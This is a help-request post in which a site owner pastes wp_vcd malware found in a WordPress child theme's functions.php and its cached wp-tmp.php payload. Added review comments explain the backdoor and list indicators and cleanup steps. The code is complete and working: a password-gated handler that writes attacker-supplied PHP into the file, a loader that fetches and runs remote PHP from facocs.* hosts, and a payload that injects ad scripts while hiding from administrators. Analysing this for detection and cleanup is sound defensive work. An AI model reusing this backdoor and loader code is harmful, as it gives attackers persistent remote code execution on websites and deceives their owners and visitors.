I found the following code in a child theme's functions.php.
Even if you delete it, it is re-generated automatically:
// NOTE(review): this block is a remote-control handler, not theme code.
// It runs on every page load (functions.php is loaded with the theme) and reacts to any request
// that carries both an `action` and a `password` parameter. $_REQUEST is used, so the parameters
// may arrive via the query string or a POST body (and cookies, depending on PHP's request_order).
// The "password" is a hard-coded string compared with loose `==`; it is a shared secret baked into
// the sample and is useful as an indicator when searching other files on the same host.
// Detection: look in access logs for requests with `action=change_domain` or `action=change_code`
// in the query string (POST bodies are normally not logged), and for the literal responses below.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '39790f7c9b39216528df57a9c6c72032')) {
$div_code_name = "wp_vcd";
switch ($_REQUEST['action']) {
// `change_domain`: rewrites this very file (__FILE__) on disk.
case 'change_domain';
if (isset($_REQUEST['newdomain'])) {
if (!empty($_REQUEST['newdomain'])) {
if ($file = @file_get_contents(__FILE__)) {
// Locates the host name used in the `$tmpcontent = @file_get_contents("http://<host>/code.php` fetch further down.
if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
// Every occurrence of the first matched host is replaced with the request-supplied value,
// i.e. the download source of the loader can be repointed without touching the file by hand.
$file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
// `@` hides write failures; a read-only functions.php makes this step fail silently.
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
// `change_code`: replaces a marked region of this file with request-supplied text.
case 'change_code';
if (isset($_REQUEST['newcode'])) {
if (!empty($_REQUEST['newcode'])) {
if ($file = @file_get_contents(__FILE__)) {
// Looks for text between the comment markers `//$start_wp_theme_tmp` and `//$end_wp_theme_tmp`.
// NOTE(review): those markers do not appear in the listing as pasted — presumably stripped; confirm against the file on disk.
if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
// The captured region is swapped for the `newcode` parameter and written back, so whatever
// PHP the sender supplies becomes part of functions.php and runs on subsequent requests.
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default:
// Distinctive error string; can serve as a content signature when scanning files or responses.
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
// Ends the request here so no normal WordPress page is rendered for a control request.
die("");
}
// NOTE(review): loader stage. On ordinary page loads it downloads PHP from a remote host over
// plain HTTP, executes it, and caches a copy on disk so it can keep running when the remote
// hosts are unreachable. Indicators visible in this block: hosts www.facocs.com / www.facocs.pw /
// www.facocs.top (path /code.php), cached file name wp-tmp.php, temp-file prefix theme_temp_setup.
// Removing only this block is unlikely to be sufficient: the poster reports it is re-generated,
// which implies another modified file on the site that is not shown on this page.
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
// The function_exists() guard keeps the loader from being declared twice in one request.
if (!function_exists('theme_temp_setup')) {
// $path is not used anywhere else in this listing. The second index is a bare constant
// (REQUEST_URI without quotes): a warning with string fallback before PHP 8, an Error from PHP 8.0.
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
// Skips requests whose URI contains wp-cron.php or xmlrpc.php (loose `== false` comparison).
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
// Fallback downloader: fetches $url with cURL, follows redirects, returns the response body
// (or false on failure). Used below when file_get_contents() on a URL yields nothing.
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
// Executes an arbitrary PHP string: writes it to a temp file prefixed with "<?php\n",
// include()s that file, deletes it, and returns the variables defined in this function's scope
// (which includes anything the included code assigned).
// Forensics: the temp file is removed right after use, so it normally leaves no trace; a file
// starting with the prefix theme_temp_setup in the temp dir or web root may remain if a request
// was interrupted between include and unlink.
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
// Empty success branch: only a failed/zero-byte write triggers the retry below.
if (fwrite($handle, "<?php\n" . $phpCode)) {
} else {
// Retry in the current working directory when the system temp dir was not writable.
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
// Marker string the downloaded content must contain. It is only a substring check, not a
// signature: anyone who controls the response from these hosts (or the plain-HTTP path to them)
// controls what PHP runs on this site.
$wp_auth_key = '0bb00640fa54049fc4c2c5e080f9f51a';
// First source: www.facocs.com via file_get_contents(), then via the cURL fallback.
if (($tmpcontent = @file_get_contents("http://www.facocs.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.facocs.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
// (This inner check repeats the marker test already made in the condition above.)
if (stripos($tmpcontent, $wp_auth_key) !== false) {
// Run the downloaded code and import every variable it defined into the current scope.
extract(theme_temp_setup($tmpcontent));
// Cache the payload: wp-includes/wp-tmp.php first, then the theme directory, then the current
// working directory. All three locations should be checked during cleanup.
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents("http://www.facocs.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
// Second source (www.facocs.pw): same execute-then-cache sequence, without the cURL fallback.
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents("http://www.facocs.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
// Third source (www.facocs.top): same execute-then-cache sequence.
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
// No remote source answered: fall back to the cached copies, in the same order they are written.
// Consequence for containment: blocking outbound traffic to the hosts above stops updates but
// does not stop execution while a cached wp-tmp.php containing the marker is still on disk.
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
I don't understand exactly what it does yet. It seems to download PHP code from some website and put it in wp-includes/wp-tmp.php.
Here's the content of wp-includes/wp-tmp.php:
// NOTE(review): this is the downloaded payload as cached in wp-includes/wp-tmp.php. The listing
// has no opening PHP tag; the loader shown earlier on this page prepends "<?php\n" before including it.
// Error display and reporting are switched off so failures in the code below never surface to
// visitors or to the site owner.
ini_set('display_errors', 0);
error_reporting(0);
// NOTE(review): this value differs from the marker in the functions.php listing on this page by
// two transposed characters (...f95f1a here, ...f9f51a there). As pasted, the loader's substring
// check would not match this line — possibly a transcription slip or a different variant; compare
// against the files on disk before using either value as an indicator.
$wp_auth_key = '0bb00640fa54049fc4c2c5e080f95f1a';
// Reads functions.php of the parent theme (template) and of the active/child theme (stylesheet).
$file = file_get_contents(get_template_directory() . '/functions.php');
$filec = file_get_contents(get_stylesheet_directory() . '/functions.php');
// Host rotation: any occurrence of "dacocs.top" in those files is rewritten to "dacocs.xyz".
// NOTE(review): the loader listing on this page references facocs.* hosts, not dacocs.*, so this
// replacement would not change that listing as pasted; it presumably targets another variant.
$rep = "dacocs.top";
$repw = "dacocs.xyz";
if (stripos($file, $rep) !== false) {
$new_file = str_replace($rep, $repw, $file);
// Silent write-back into the parent theme's functions.php.
@file_put_contents(get_template_directory() . '/functions.php', $new_file);
}
if (stripos($filec, $rep) !== false) {
$new_filec = str_replace($rep, $repw, $filec);
// Silent write-back into the child theme's functions.php.
@file_put_contents(get_stylesheet_directory() . '/functions.php', $new_filec);
}
// NOTE(review): monetisation and concealment stage. It injects third-party ad scripts into
// pages, but only for visitors who are not logged in, have never been logged in on this browser,
// do not come from a recorded editor/admin IP, and arrived from a search engine. The effect is
// that the site owner browsing their own site normally never sees the injected scripts.
// Indicators in this block: script hosts go.oclasrv.com and go.mobisla.com, cookies
// wordpress_cf_adm_use_adm and sevisitor, and the file wp-includes/wp-feed.php.
if (!function_exists('slider_option')) {
// Filter for `the_content`: on single-post views, appends the two external script tags to the
// post body and returns it; other views are returned unchanged. ($con is assigned but unused.)
function slider_option($content)
{
if (is_single()) {
$con = '
';
$con2 = '
<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1610264"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1610267&interactive=1&pushup=1"></script>
';
$content = $content . $con2;
}
return $content;
}
// Action for `wp_footer`: on every view that is NOT a single post, echoes the same two script
// tags into the footer, so between the two hooks all front-end pages are covered.
function slider_option_footer()
{
if (!is_single()) {
$con2 = '
<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1610264"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1610267&interactive=1&pushup=1"></script>
';
echo $con2;
}
}
// Sets a long-lived cookie (3600 * 24 * 1000 seconds, i.e. 1000 days) that tags this browser as
// belonging to someone who has been logged in; it is checked further down to suppress the ads.
function setting_my_first_cookie()
{
setcookie('wordpress_cf_adm_use_adm', 1, time() + 3600 * 24 * 1000, COOKIEPATH, COOKIE_DOMAIN);
}
// Any logged-in user gets the tagging cookie on `init`.
if (is_user_logged_in()) {
add_action('init', 'setting_my_first_cookie', 1);
}
// Users holding the `edit_others_pages` capability (editors and administrators in WordPress's
// default roles) have their IP address appended to wp-includes/wp-feed.php. That file is not part
// of WordPress core as far as this listing shows; its presence and contents are an artifact of
// this code and it should be removed during cleanup.
if (current_user_can('edit_others_pages')) {
if (file_exists(ABSPATH . 'wp-includes/wp-feed.php')) {
$ip = @file_get_contents(ABSPATH . 'wp-includes/wp-feed.php');
}
// $ip is only assigned above when the file already exists; on first run it is undefined here.
if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false) {
$ip .= $_SERVER['REMOTE_ADDR'] . '
';
@file_put_contents(ABSPATH . 'wp-includes/wp-feed.php', $ip);
}
}
// Referrer check: substrings that identify search engines and ad networks.
$ref = $_SERVER['HTTP_REFERER'];
$SE = array(
'google.',
'/search?',
'images.google.',
'web.info.com',
'search.',
'yahoo.',
'yandex',
'msn.',
'baidu',
'bing.',
'doubleclick.net',
'googleweblight.com'
);
foreach ($SE as $source) {
if (strpos($ref, $source) !== false) {
// Marks the visitor as search-engine traffic for 120 seconds so follow-up page views also qualify.
setcookie("sevisitor", 1, time() + 120, COOKIEPATH, COOKIE_DOMAIN);
$sevisitor = true;
}
}
// Gate for the injection: no tagging cookie, not logged in, IP not listed in wp-feed.php, and
// search-engine referrer (now or within the cookie's lifetime). Only then are the hooks attached.
// When verifying a cleanup, a check from a logged-in admin session will not show the scripts
// even if the code is still active — inspect the files on disk instead of relying on page views.
if (!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) {
$adtxt = @file_get_contents(ABSPATH . 'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false) {
if ($sevisitor == true || isset($_COOKIE['sevisitor'])) {
add_filter('the_content', 'slider_option');
add_action('wp_footer', 'slider_option_footer');
}
}
}
}
Has anybody encountered something like this before?